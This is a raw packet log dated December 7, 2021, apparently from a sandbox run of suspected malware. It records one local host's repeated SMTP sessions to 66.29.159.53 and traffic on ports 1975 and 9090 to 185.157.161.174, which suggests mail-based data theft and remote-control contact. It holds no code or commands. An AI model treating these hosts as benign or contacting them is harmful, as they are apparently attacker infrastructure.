                                                                                              Dec 7, 2021 13:40:09.365575075 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.367121935 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.368597031 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:09.533807993 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.535362005 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.535928965 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:09.701611996 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.703052044 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.800546885 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:09.965909004 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.969434977 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:09.970366001 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.135637045 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.138590097 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.141556978 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.306852102 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.324129105 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.324647903 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.489996910 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.490781069 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.491524935 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.491751909 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.656733036 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.656759977 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.656800032 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.656883001 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.656894922 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.822772026 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.832678080 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.837865114 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.838289022 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:10.842379093 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.003357887 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.003379107 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.003642082 CET4654976566.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.003751993 CET49765465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.008975983 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.009109974 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.177175999 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.177797079 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.342967987 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.343246937 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.343624115 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.508748055 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.582062006 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.747347116 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.748986006 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.749013901 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.749030113 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.749046087 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.749062061 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.749116898 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.762382030 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:11.927999973 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:11.928721905 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.120492935 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.217792034 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.285757065 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.286006927 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.287396908 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.383681059 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.384670973 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.452717066 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.454161882 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.454782009 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.552344084 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.552918911 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.619966030 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.622764111 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.623342037 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.718096018 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.718250036 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.718624115 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.788497925 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.790952921 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.791486025 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.821738958 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.825840950 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:40:12.883874893 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.890197992 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:12.956583023 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.994713068 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.996289015 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.056678057 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.056715012 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.059161901 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.067043066 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.104095936 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.105385065 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.161405087 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.162636042 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.164474964 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.164973021 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.165220022 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.165478945 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.165755033 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.165956020 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.166122913 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.166295052 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.166598082 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.166764021 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.166903019 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.168730974 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.168982029 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.169131994 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.169322968 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.169471979 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.225151062 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.225173950 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.232209921 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.233174086 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.233269930 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.269917965 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.270019054 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.270977020 CET5874976866.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.273317099 CET49768587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.330343008 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.330444098 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.330498934 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.330703974 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.331094027 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.331160069 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.331372976 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.331439018 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.331446886 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.331532001 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.331597090 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.331604958 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.331720114 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.331770897 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.331948996 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.331978083 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332014084 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332020044 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332262993 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.332318068 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332391977 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.332418919 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332457066 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332463026 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332493067 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.332556963 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.332565069 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.334388018 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.334405899 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.334484100 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.334502935 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.334563971 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.334568977 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.334734917 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.334800959 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.334808111 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.335056067 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.335131884 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.335257053 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.495913029 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.496025085 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.496675968 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.496701956 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.496753931 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.496774912 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.496788025 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.496828079 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.496835947 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.496865034 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.496881962 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.496999025 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.497029066 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.497051954 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.497081995 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.497091055 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.497410059 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.497474909 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.497492075 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.497584105 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.497767925 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.499728918 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.499751091 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.499799967 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.499820948 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.499830008 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.499882936 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.499882936 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.499933004 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.499937057 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.500241041 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.500284910 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.500327110 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.500386000 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.507752895 CET4976980192.168.2.4104.16.154.36
                                                                                              Dec 7, 2021 13:40:13.525034904 CET8049769104.16.154.36192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.525881052 CET4976980192.168.2.4104.16.154.36
                                                                                              Dec 7, 2021 13:40:13.525902987 CET4976980192.168.2.4104.16.154.36
                                                                                              Dec 7, 2021 13:40:13.546622992 CET8049769104.16.154.36192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.559828997 CET8049769104.16.154.36192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.627901077 CET4976980192.168.2.4104.16.154.36
                                                                                              Dec 7, 2021 13:40:13.661236048 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.661324978 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.662337065 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662375927 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662389040 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662434101 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.662600040 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662663937 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662669897 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.662703991 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662739038 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.662890911 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663048983 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663202047 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663352966 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663481951 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663645983 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663758993 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.663887024 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:13.664917946 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.664941072 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.664952040 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.664982080 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.665062904 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.665497065 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.665510893 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.827322960 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.827353954 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.827526093 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.827543020 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.827884912 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.827900887 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828170061 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828242064 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828442097 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828458071 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828726053 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828742981 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.828922033 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.837460041 CET5874976766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.940408945 CET49767587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:15.651320934 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:15.810107946 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:15.810201883 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:15.971216917 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:15.971534014 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.129906893 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.130117893 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.130337000 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.288464069 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.289144039 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.447396040 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.447499990 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.448914051 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.449798107 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.607211113 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.607237101 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.607989073 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.608432055 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.609005928 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.725850105 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.767076969 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.769162893 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.769790888 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.883951902 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.884362936 CET5874977066.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:16.884670973 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:16.885047913 CET49770587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:19.164287090 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:19.323019981 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.324012995 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:19.484025002 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.491142035 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:19.649211884 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.649755955 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.650131941 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:19.808478117 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.809705019 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:19.969203949 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.969228983 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.117990971 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.118859053 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.276371956 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.276398897 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.278253078 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.278629065 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.279889107 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.438045979 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.439332008 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.439879894 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.598216057 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.601349115 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.601821899 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.694655895 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.759876966 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.762233019 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.764238119 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.852972031 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.853080034 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:20.853344917 CET5874977166.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:20.853481054 CET49771587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:24.496166945 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:24.531042099 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.537561893 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:40:24.654779911 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.656588078 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:24.818486929 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.820207119 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:24.928828001 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.978205919 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.978636026 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.978931904 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.136991978 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.137492895 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.295622110 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.295856953 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.310039043 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.310862064 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.468353033 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.468381882 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.469378948 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.469563961 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.470123053 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.630135059 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.630800009 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.631253958 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.789566994 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.793204069 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.793961048 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:25.952214003 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.954950094 CET5874977466.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:25.955394983 CET49774587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:26.115291119 CET5874977466.29.159.53192.168.2.4
